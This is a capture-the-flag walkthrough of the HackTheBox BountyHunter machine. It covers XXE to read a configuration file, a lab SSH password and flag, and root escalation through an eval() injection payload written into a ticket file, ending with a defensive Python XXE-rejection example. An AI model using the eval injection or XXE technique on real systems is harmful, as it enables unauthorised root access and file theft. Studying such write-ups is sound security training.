BountyHunter is a Linux-based machine from HackTheBox that requires patient web searching, some familiarity with encoding, and Python hacking skills for the privilege escalation.
XXE is the technique used to gain initial access. The web application is vulnerable to XML injection, which allows an attacker to interfere with the application's processing of XML data. This loophole can be used to read configuration files on the target system; a DB configuration file contains login credentials that can be used to gain access.
The initial account can execute a Python script with root privileges. This script is exploited through one of Python's dangerous functions: eval(), exec() and input().
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-05 22:26 HKT
Nmap scan report for 10.10.11.100
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds
Enumeration Strategies
No vulnerability was found in the SSH or HTTP service itself, so the next step was to review the web application for information leakage or misconfiguration.
Hacking Process Part 1 – Enumeration
With basic web enumeration using gobuster, a set of web pages was found; the interesting one had a submission function.
The data passed to the backend server was base64 and URL encoded. After decoding, an XML payload was found, as shown below.
Log in over SSH with the account "development" and the password "m19RoAU0hP41A1sTsq6K"; the user flag was found.
a0929aa9a9ec25cec7bc41a139f2b829
Hacking Process Part 3 – Privilege Escalation
Simply listing the sudo rights of this account showed something interesting: a Python script that can be executed as root with no password required.
Check the ticketValidator.py file:
def load_file(loc):
    # Only a file name ending in .md is accepted; nothing else about the file is checked
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for irregularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            # Only the part before the first "+" is treated as the ticket code...
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                # ...but the whole line is handed to eval(): this is the weak point
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close  # as on the target: no parentheses, so the file is never actually closed

main()
The Python script reads an input file with the .md extension and applies the following logic:
The first three lines of the input file must be
# Skytrain Inc
## Ticket to root
__Ticket Code:__
The fourth line must start with ** followed by a number and a "+" (the script takes everything before the first "+" as the ticket code)
The ticket code mod 7 must be 4, and the evaluated expression must be greater than 100
Ultimately, I found the magic number 102 (102 mod 7 is 4, and 102 + 2 = 104 is greater than 100). The eval() call is the weak point here, as described in the article Python Hacking. In order to keep the eval statement true and make the hack work, one more condition is appended for eval to evaluate.
Finally, I created the following file:
# Skytrain Inc
## Ticket to root
__Ticket Code:__
**102+ 2 == 104 and __import__('os').system('/bin/bash') == False
Running the Python script with sudo gave root access.
Conclusion
To prevent the XXE vulnerability, set libxml_disable_entity_loader to true so that the XML input is parsed without loading external entities.
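The mitigation named above is PHP-specific, and since PHP 8.0 libxml_disable_entity_loader() is deprecated because external entity loading is already disabled by default with libxml 2.9.0 and later. The same idea applied in Python's standard library, as an added example that is not the target application's code and not from the writeup: entity definitions (including SYSTEM entities pointing at local files) can only appear inside a DTD, so an untrusted document that carries any DOCTYPE is refused before it reaches the element parser. That also covers entity-expansion bombs, which xml.etree.ElementTree does not defend against on its own. The submission XML and the field names below are constructed for this example, and the SYSTEM target is a placeholder.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Added example: defensive parsing of untrusted XML with the standard library.
# Not the application's PHP code (the writeup does not show it).


class UnsafeXMLError(ValueError):
    """Raised when an untrusted document carries a DTD, the vehicle for XXE."""


def reject_doctype(data: bytes) -> None:
    """Scan the document with expat and abort on the first DOCTYPE declaration.

    Expat decodes the document itself, so this also catches a DOCTYPE in a
    UTF-16 document that a plain byte-string search for b"<!DOCTYPE" would miss.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised inside an expat handler propagate out of Parse()
        raise UnsafeXMLError(f"DOCTYPE for {name!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse client-supplied XML, refusing any document type declaration."""
    reject_doctype(data)
    return ET.fromstring(data)


def submission_title(data: bytes):
    """Return the <title> of a submission, or None if the XML is refused or malformed."""
    try:
        root = parse_untrusted_xml(data)
    except (UnsafeXMLError, ET.ParseError, xml.parsers.expat.ExpatError):
        return None
    node = root.find("title")
    return node.text if node is not None else None


# Constructed samples (field names are assumptions, not the target's real form).
BENIGN_SUBMISSION = b"""<?xml version="1.0"?>
<bugreport><title>Broken link on /about</title><cwe>CWE-79</cwe></bugreport>"""

# Shape of an XXE submission: a DTD defines an external entity and the body references it.
XXE_SUBMISSION = b"""<?xml version="1.0"?>
<!DOCTYPE bugreport [<!ENTITY ext SYSTEM "file:///PLACEHOLDER/path">]>
<bugreport><title>&ext;</title></bugreport>"""

# Same trick with a DTD but no external entity: internal entity expansion.
EXPANSION_SUBMISSION = b"""<?xml version="1.0"?>
<!DOCTYPE bugreport [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;">]>
<bugreport><title>&b;</title></bugreport>"""

if __name__ == "__main__":
    print(submission_title(BENIGN_SUBMISSION))     # Broken link on /about
    print(submission_title(XXE_SUBMISSION))        # None
    print(submission_title(EXPANSION_SUBMISSION))  # None
```

Refusing the DOCTYPE outright is simpler and stricter than trying to allow "safe" DTDs; an application that only ever receives simple data documents from clients has no reason to accept one.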